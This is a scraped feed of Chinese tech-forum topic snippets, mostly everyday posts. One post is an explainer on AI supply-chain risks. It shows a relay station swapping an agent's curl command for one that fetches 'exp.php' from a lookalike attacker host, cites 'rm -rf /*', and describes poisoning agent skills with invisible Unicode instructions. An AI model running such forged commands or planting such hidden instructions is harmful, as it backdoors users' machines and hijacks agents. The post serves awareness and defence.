最近攒够了500积分原本想换冰佬的公益站,但是看佬友说冰佬的不能用了 求大家推荐一个稳定的公益站 5 个帖子 - 4 位参与者 阅读完整话题
佬友们有买黄金的吗?最近真的是跌惨了,都跌破900了,原本想着拿着挣点小钱,没想到跌这么多。 11 个帖子 - 11 位参与者 阅读完整话题
op 原本持有两个手机号 X 和 Y 。 X:常用,入网约 5 年,绑定了几乎所有的平台,包括银行和京东。 Y:备用,基本没绑定任何平台,入网 10 年以上。 最近新办了手机号 Z ,准备弃用手机号 X ,遂把所有平台的手机号从 X 迁移到 Z ,包括 taobao 、weixin 、meituan 以及各种收件地址。 由于银行要求绑定手机号入网至少一个月,因此绑定失败,转而都绑定在了号码 Y 上。 由于很少使用京东,准备注销京东账号,也就顺手绑定到了号码 Y 上。 现在过去了小半年,发现新手机号 Z 几乎没有贷款和营销的电话短信,而手机号 Y 反而每天三五个贷款和营销的电话短信,不堪其扰。
op 原本持有两个手机号 X 和 Y 。 X:常用,入网约 5 年,绑定了几乎所有的平台,包括银行和京东。 Y:备用,基本没绑定任何平台,入网 10 年以上。 最近新办了手机号 Z ,准备弃用手机号 X ,遂把所有平台的手机号从 X 迁移到 Z ,包括 taobao 、weixin 、meituan 以及各种收件地址。 由于银行要求绑定手机号入网至少一个月,因此绑定失败,转而都绑定在了号码 Y 上。 由于很少使用京东,准备注销京东账号,也就顺手绑定到了号码 Y 上。 现在过去了小半年,发现新手机号 Z 几乎没有贷款和营销的电话短信,而手机号 Y 反而每天三五个贷款和营销的电话短信,不堪其扰。
op 原本持有两个手机号 X 和 Y 。 X:常用,入网约 5 年,绑定了几乎所有的平台,包括银行和京东。 Y:备用,基本没绑定任何平台,入网 10 年以上。 最近新办了手机号 Z ,准备弃用手机号 X ,遂把所有平台的手机号从 X 迁移到 Z ,包括 taobao 、weixin 、meituan 以及各种收件地址。 由于银行要求绑定手机号入网至少一个月,因此绑定失败,转而都绑定在了号码 Y 上。 由于很少使用京东,准备注销京东账号,也就顺手绑定到了号码 Y 上。 现在过去了小半年,发现新手机号 Z 几乎没有贷款和营销的电话短信,而手机号 Y 反而每天三五个贷款和营销的电话短信,不堪其扰。
这是新的PLUS界面 原本以为 极速 对应 Instant 均衡 对应 Thinking 标准 高级 对应 Thinking 进阶 但是好像不是这样的 均衡对应 GPT5 mini去了 高级似乎对应的是Thinking 标准 那Thinking 进阶去哪了? Instant 又是个啥 我错乱了 2 个帖子 - 2 位参与者 阅读完整话题
原本以为opus已经很贵了,没想到fable更贵,直接用不起了,干了个活值100,花出去10000块的感觉。 18 个帖子 - 12 位参与者 阅读完整话题
原本想着引入 AI 是减负提效,把重复机械的工作交给工具处理,基础代码都交给AI,能腾出时间休息一下摸摸鱼。结果实际用上之后完全反过来,做不完的需求,老板觉得现在做啥都简单了,刚给需求一会就来问好没有?怎么还没好啊?我都不知道怎么回答了,感觉好累… 3 个帖子 - 3 位参与者 阅读完整话题
现在就业环境很差,原本的企业与员工的信任关系基本没有了 遥想 17 、18 年的时候,那个时候环境还算不错。上班氛围还算可以,虽说有企业内部问题,但总体还算积极向上。 时不时还组织活动聚一下,偶尔也搞团队氛围节目什么的。大家还想着可以多奋斗,多挣钱,跟着公司一起成长。 现在这个环境,员工成了负资产,在工作的觉得随时可能会被优化。已经失业的找工作的周期长,找工作的积极性也下降很多。 总体给我的感觉就是,企业在找落难的凤凰,员工在找识千里马的伯乐。 最后看透了,觉得工作就是出卖时间,就是在卖命。 而企业呢,觉得员工是趴在自己身上的寄生虫, 光混不干活,总想着用什么法子折腾一下。 最后的结局就是,员工找工作也觉得没意思,去哪干都是被当驴使。但不干活又不知道能干嘛,毕竟还算年轻,手上的积蓄也不够完全躺平。 不知道有多少人跟我一样的想法
曾经执着于对错,想让事情成为它原本应该的样子,有据可循,合乎情理。。。 现如今,连"原本应该"都迷惑了,什么是应该的样子,原本可能就是混沌的,那一直在追求的算不算笑话? 存在,即合理。这句话不知不觉已经劝诫自己到麻木。 疲惫,好疲惫,不想争辩,不想争取。 只想休息,向往大海,想在潮起潮落中感受一份宁静。 记得一句话,不是人老了,才是弯腰驼背,而是弯腰驼背,人才老了。感念此言良久立,忽觉地铁已过站。 10 个帖子 - 10 位参与者 阅读完整话题
我最近看了抢先版电影,感觉和原本想象中的后室大相径庭:没有那么多复杂层级,也没有那种无边无际的空旷感,场景切换和整体氛围都跟我预期的不太一样。 1 个帖子 - 1 位参与者 阅读完整话题
原本的计划是全面的科普一下普通人会遇到的一些AI安全问题,还包括提示词注入,RAG投毒等。但是最近实在感觉精疲力竭,没有什么精力去研究了,于是产生了这篇半途而废版,如果有看完的佬友应该能发现从SKILL那里就已经是不想写了。就放搞七捻三了。就当一个小科普吧,大家当个故事看 引言 随着大模型技术的快速发展,与之相关的技术生态也在不断壮大。MCP、RAG、Skill 这些概念越来越频繁地出现在我们的视野中,甚至逐渐变得日常。如今,不止是程序员,几乎所有接触互联网的人,都开始慢慢使用豆包、元宝这类 ChatBot。前段时间 OpenClaw(龙虾)的爆火,掀起了一股“养虾潮”,也让“Agent”这个词走进了更多人的认知。现在,Codex、Claude Code 等工具几乎成为一线网络相关从业人员的标配,覆盖了短视频从业者、金融从业者,甚至老师和普通学生。然而,随着 Agent 的普及,AI 供应链的安全问题也必须进入我们的视野——因为这关乎到我们每一个人的安全。 本文将围绕着我们普通人将会接触到的一些ai供应链的安全问题所展开。 一、AI中转站安全 AI中转站可能是普通人使用AI最先接触到的东西。 发生原因 大家都知道ai好用,但是随着我们对ai的依赖的深化,token的消耗也在呈指数级上升(特别是国外模型),所以此时对于AI的使用发生了这几个问题: token费用难以承受,日常成本正在提高 对于海外模型还存在网络问题,开发、日常体验的感受大打折扣 账号存在一定的封号问题 基于以上的问题,我们在ai时代出现了一种新的商业组织—— 中转站 中转站的出现为我们提供了很多的便利:价格低、国内直连所以速度快,稳定。但是与此同时,它的背后也藏着我们看不到的风险。 中转站为什么会有风险,总体来说就是由于中转站处于用户和上游API之间的中间桥段,我们和AI公司之间所有的通信都要经过它,所以这之间的一切,理论上他都拥有绝对控制权。 核心危险汇总 中转站的危险主要有以下方面: 数据泄露 、 模型造假 、 命令执行(工具调用伪造) 模型造假 这是我们最先会想到的,大部分人可能都有这种担心。很遗憾,关于模型的真假,确实只能凭中转站的良心了。 因为实现方法太简单了。 # 用户请求中的 model 字段 {"model": "claude-opus-4.7", "messages": [...]} # 中转站转发时替换为 {"model": "deepseek-v4-flash", "messages": [...]} 中转站只要在这个不起眼的model字段做一个小小的改动,你以为的opus4.7实际请求的就是deepseek了。中间相差的价格各位都应该清楚。 这对于非重度使用的人来说几乎无法发现,甚至经常使用的人可能说:”opus的风格这么独特,换成deepseek我怎么可能看不出来“。现在大家应该都听过skill吧,加上 前任.skill 它就能模仿你前任的语气,那如果给deepseek加上 claude.skill 呢? 数据泄露 中转站处于通信的中心节点,可以无条件看到并记录所有双向交互数据: (图片来自 【AI供应链威胁】API 中转站投毒的攻击链深入分析 ) 可以看到,在我们使用AI的过程中,所有的请求和响应中转站都是可以无条件查看的,应该所有流量都要经过它,过程中中转站利用脚本监控日志的方式可以轻松实现任意信息的转存,甚至修改。 这些情况我们作为用户是完全没有办法察觉的。 造成的后果 : 敏感资产暴露, .env 文件、项目账号密码 等明文暴露。 长期使用导致画像暴露,攻击者通过长期收集信息,完善整个项目流程,方便后续对业务进行白盒攻击 实际演示: 命令执行(工具调用伪造) 这是最危险,危害最大的攻击。 事想一下你在你的服务器上部署了claude code,并且调用了中转站的api,你让它去做其他合法请求请求的过程中: curl -i -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \ -H "Accept: text/html,application/xhtml+xml" \ -H "Accept-Language: zh-CN,zh;q=0.9" \ http://baidu.com # 被换成了 curl -i -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \ -H "Accept: text/html,application/xhtml+xml" \ -H "Accept-Language: zh-CN,zh;q=0.9" \ http://baidv.com/exp.php 如此长的命令,你真的会发现吗,此时你点击了 “yes” ,也就意味着你的服务器已经被植入了后门。 更别说你让他执行一些删除文件的操作时给你执行 rm -rf /* 了。 他造成的后果: 任意命令执行: Agent 通常具备本地系统或开发环境的读写权限。在自动执行、弱确认或用户误确认的场景下,可能导致本地命令执行。 越权与长期控制: 如果伪造的指令包含下载恶意脚本或建立外部网络连接,这种行为风险将直接演变为系统被远控(GetShell)或植入长期后门,导致机器沦为肉鸡。 二、SKILL投毒 大家平时都会使用来自各种来源的skill提高自己的效率,但是其实skill也会存在投毒的情况。甚至可以让你看不到 这里举一个简单的例子: 你可能说你看一下SKILL.md就看到了。 你完全发现不了。因为这涉及到一种 Unicode隐藏字符 的技术。大概的原理就是使用了一些在大部分编辑器下是不可见字符的Unicode编码。导致我们肉眼是看不到的,但是LLM是可以看见的: 关于更多技术原理就不多说了,本文仅作为科普。感兴趣可以自行查看 【AI供应链威胁】Unicode隐藏指令Skills后门的实践与思考 我这个案例大家复现不一定成果,因为我用了opus4.6(且不一定保真),而且做了很多实验才偶尔成功。但是这里想说的是,我这个投毒是非常明显,赤裸裸的写出来了命令执行。那如果稍加修饰,引入更多提示词注入技术,还有利用远程服务器,以curl的形式命令执行,并且放在一个非常复杂的skill文件中,那么隐蔽性危害就可想而知了 这里有一个网站给大家,可以自查一下,我也是用它制作的SKILL。 embracethered.com ASCII Smuggler - Crafting Invisible Text and Decoding Hidden Secret - Embrace... Convert ASCII text into invisible Unicode encodings using Unicode Tags, Variant Selectors, and Sneaky Bits, and decode hidden messages. 效果: 把文本张贴进去就会自动检测是否有隐藏unicode字符,点击 Encode & Copy 就会编码并自动复制,然后张贴进SKILL.md就好了。 当然这是一种比较少见的绕过检测的技术,大部分就是直接明文写入,只是隐藏的比较好,大家多注意野生SKILL不要随便用即可。 三、MCP投毒 其实mcp和skill同理,会隐藏一些提示词,这里就放个案例吧 截图来自 悬镜-2025开源供应链投毒分析技术报告 9 个帖子 - 5 位参与者 阅读完整话题
如图,移动把原本一年mclaw套餐改成了一个月 5 个帖子 - 4 位参与者 阅读完整话题
苹果ID账号订阅了 chatgpt pro20x 如何退款,我 App Store 有 200刀,原本打算给另外一个账号充值来着。 4 个帖子 - 3 位参与者 阅读完整话题
没一个能用的 要么就是断断续续的 还不如不疯狂啊 8 个帖子 - 4 位参与者 阅读完整话题
百度网盘、115网盘都会直接覆盖,难道想保存这个信息只能自己组nas吗? 3 个帖子 - 2 位参与者 阅读完整话题
原本一直没有升级,本着够用就可以,最近要安装一个新的应用,老版本的系统不支持,被逼升级。 现在常开着微信、钉钉,再开个应用,发现原来打开的微信或者钉钉要重新打开,是不是老机器内存太小了。不必要的应用都是不允许后台刷新的,这是倒闭换新啊!
最近从 Codex 转用 Pi Coding Agent,于是想把原本的 Codex 给卸载掉。但是沙盒相关的功能在系统里拉屎实在不知道该怎么安全的清理… Codex 拉的屎包括但不限于创建沙盒用户和组,修改 Codex 打开过的文件夹安全权限… Codex 拉的 (点击了解更多详细信息) 看了 GitHub 上有关的 issue,改的还不止项目文件夹,甚至还会修改 AppData 的权限…不知道还有没有其他隐藏的坑。 Windows 的权限管理搞不明白,有没有佬指点一下该怎么安全的清理这一坨东西 github.com/openai/codex No way to do a clean uninstall of Codex CLI on Windows that reverts system sandbox changes 已打开 07:41PM - 20 Mar 26 UTC zusorio bug windows-os sandbox CLI ### What version of Codex CLI is running? codex-cli 0.116.0 ### What subscript … ion do you have? Pro ### Which model were you using? _No response_ ### What platform is your computer? Microsoft Windows NT 10.0.26200.0 x64 ### What terminal emulator and version are you using (if applicable)? _No response_ ### What issue are you seeing? I ran into #12226. I'd like to revert the changes the Codex CLI made to my system during install and cleanly uninstall it. There isn't a way to do this. It seems crazy that the install process makes deep enough changes to my system to break something as core as SSH, and then there's no way to remove it. ### What steps can reproduce the bug? Install Codex CLI with Sandbox on Windows. ### What is the expected behavior? _No response_ ### Additional information _No response_ github.com/openai/codex Codex sandbox installation corrupts ACL on AppData 已打开 03:19PM - 25 Mar 26 UTC thunderstatic bug windows-os sandbox ### What version of the Codex App are you using (From “About Codex” dialog)? 26 … .313.5234 ### What subscription do you have? Free ### What platform is your computer? Microsoft Windows NT 10.0.19045.0 x64 ### What issue are you seeing? #### Description After installing Codex on Windows 10 and subsequently enabling/installing its sandbox component, Opera, Opera GX, and Opera Developer fail to launch entirely. The browsers flash a black screen 2–3 times and silently close. The issue appears specifically after the sandbox setup step, not immediately after the initial Codex installation. Chrome (stable) and Brave are unaffected. #### Root Cause Codex creates a local Windows group `CodexSandboxUsers` and local users `CodexSandboxOffline` / `CodexSandboxOnline` during installation, and modifies ACL permissions on `AppData\Local`. This breaks the Chromium sandbox for any browser installed under `AppData\Local` (Opera, Opera GX, Chrome Canary), because the GPU process requires the `ALL APPLICATION PACKAGES (S-1-15-2-1)` permission on that path to launch in sandboxed mode. Browsers installed in `Program Files` (Chrome stable, Brave, Edge) are unaffected because their `AppData\Local` path is not involved in the same way. ### What steps can reproduce the bug? 1. Install Codex on Windows 10 2. Go through the sandbox setup/activation step within Codex 3. Launch Opera, Opera GX, or Opera Developer → browser closes immediately ### What is the expected behavior? The sandbox installation step should not modify ACL permissions on `AppData\Local` in a way that affects other applications, or should at minimum restore them on uninstall/rollback. github.com/openai/codex Windows sandbox hardening 已打开 07:14PM - 21 May 26 UTC oxsignal enhancement windows-os sandbox CLI app ### What variant of Codex are you using? CLI and Desktop ### What feature woul … d you like to see? One more hardening suggestion for the Windows sandbox: When the workspace/write root is `%USERPROFILE%`, Codex expands it into top-level user-profile children. This can include sensitive locations such as OneDrive, AppData, Documents, Downloads, Desktop, and similar profile directories. Even if recent patches prevent stale capability SIDs from being reused across unrelated workspaces, the filesystem ACL setup can still leave Codex-related ACEs on these profile child directories. In my environment I had to manually clean up stale CodexSandboxUsers / capability SID ACEs from several user-profile paths. I think `%USERPROFILE%` should either be rejected as a workspace write root, or sensitive profile children should be excluded by default. At minimum, locations such as the following should not receive broad writable ACLs: - `%APPDATA%` - `%LOCALAPPDATA%` - `%USERPROFILE%\OneDrive` - `%USERPROFILE%\Documents` - `%USERPROFILE%\Desktop` - `%USERPROFILE%\Downloads` - `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` Developer-tool caches that normally live under AppData should be redirected to a Codex-controlled cache/temp directory instead of granting broad AppData write access. I also recommend adding an uninstall/cleanup path for Windows sandbox state. If Codex is uninstalled or the Windows sandbox is reset, it should remove the local Codex sandbox users/groups and clean up Codex-created ACEs from the user profile. Otherwise, stale CodexSandboxUsers / capability SID ACL entries can remain on disk indefinitely after the product is removed. ### Additional information _No response_ 3 个帖子 - 3 位参与者 阅读完整话题
我是用完了,原本 6 月 7 号重置,现在推迟到 6 月 11 号了.不知道没用完会不会推迟 3 个帖子 - 3 位参与者 阅读完整话题
pro5x codex重置时间原本是7号 但是刚用完直接重置了 这是什么机制??? 2 个帖子 - 1 位参与者 阅读完整话题